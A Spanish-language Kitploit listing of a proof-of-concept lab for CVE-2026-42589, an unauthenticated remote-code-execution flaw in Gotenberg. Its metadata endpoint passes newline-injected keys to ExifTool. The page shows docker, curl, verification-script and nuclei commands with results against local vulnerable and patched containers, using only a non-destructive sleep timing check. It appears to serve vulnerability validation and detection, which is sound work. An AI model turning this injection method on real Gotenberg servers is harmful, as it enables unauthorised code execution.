Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
POC_CVE-2026-42589 — POC_CVE-2026-42589 | Kitploit
Herramientas/GitHubGitHub/fineman999/poc_cve-2026-42589
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubfineman999/poc_cve-2026-42589

POC_CVE-2026-42589

POC_CVE-2026-42589

Ver Repositorio
13hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

POC_CVE-2026-42589

Laboratorio de reproducción local y borrador de plantilla de nuclei para CVE-2026-42589 que afecta a Gotenberg.

Resumen

CVE-2026-42589 es un problema de ejecución remota de código no autenticado en Gotenberg causado por la inyección de nuevas líneas en la clave de metadatos en:

root@kitploit:~
POST /forms/pdfengines/metadata/write

Gotenberg afectado reenvía las claves de metadatos controladas por el usuario a ExifTool sin rechazar caracteres de control. Una clave de metadatos que contiene nuevas líneas escapadas en JSON puede dividirse en argumentos adicionales de ExifTool.

Este laboratorio se utilizó para validar:

  • comportamiento vulnerable en gotenberg/gotenberg:8.29.1
  • comportamiento corregido en gotenberg/gotenberg:8.31.0

La plantilla de nuclei utiliza solo una verificación de tiempo no destructiva con sleep 6.

Referencias

  • Aviso de GitHub: https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
Descargar herramienta
  • Versión corregida: https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
  • Documentación de ExifTool: https://exiftool.org/exiftool_pod.html
  • Archivos

    • docker-compose.yml
    • docker-compose.latest.yml
    • CVE-2026-42589.yaml
    • manual_verify.py
    • sample.pdf
    • README.md

    Prueba vulnerable

    Inicia Gotenberg 8.29.1:

    root@kitploit:~
    docker compose down -v
    docker compose up -d
    docker compose logs --tail=100 gotenberg
    

    Verifica la versión:

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Verificación manual de tiempo multipart sin procesar:

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Señal vulnerable esperada:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.xs
    

    Resultado vulnerable observado:

    root@kitploit:~
    HTTP/1.1 500 Internal Server Error
    TOTAL_TIME=6.300s
    Internal Server Error
    

    Control de versión parcheada

    Inicia Gotenberg 8.31.0:

    root@kitploit:~
    docker compose -f docker-compose.latest.yml down -v
    docker compose -f docker-compose.latest.yml up -d
    docker compose -f docker-compose.latest.yml logs --tail=100 gotenberg
    

    Verifica la versión:

    root@kitploit:~
    curl -s http://127.0.0.1:3000/version
    

    Ejecuta la misma verificación de tiempo manual:

    root@kitploit:~
    python3 manual_verify.py http://127.0.0.1:3000
    

    Resultado de versión parcheada observado:

    root@kitploit:~
    HTTP/1.1 400 Bad Request
    TOTAL_TIME=0.145s
    At least one PDF engine cannot process the requested metadata, while others may have failed to convert due to different issues
    

    Nuclei

    Valida la plantilla:

    root@kitploit:~
    nuclei -duc -validate -t CVE-2026-42589.yaml
    

    Ejecuta contra el objetivo vulnerable:

    root@kitploit:~
    nuclei -duc -u http://127.0.0.1:3000 -t CVE-2026-42589.yaml
    

    Comportamiento esperado:

    • 8.29.1: coincidencia después de la respuesta 500 retardada
    • 8.31.0: sin coincidencia

    Resultado vulnerable observado:

    root@kitploit:~
    [CVE-2026-42589] [http] [critical] http://127.0.0.1:3000/forms/pdfengines/metadata/write
    [INF] Scan completed in 6.245907708s. 1 matches found.
    

    Resultado de versión parcheada observado:

    root@kitploit:~
    [INF] Scan completed in 93.01425ms. No results found.
    

    Notas

    • Este laboratorio evita intencionalmente escrituras de archivos, shells inversas y devoluciones de llamada fuera de banda.
    • La plantilla detecta comportamiento, no solo un banner de versión.
    • No se utilizaron objetivos reales.
    • Úsalo solo en sistemas que poseas o para los que tengas autorización explícita para realizar pruebas.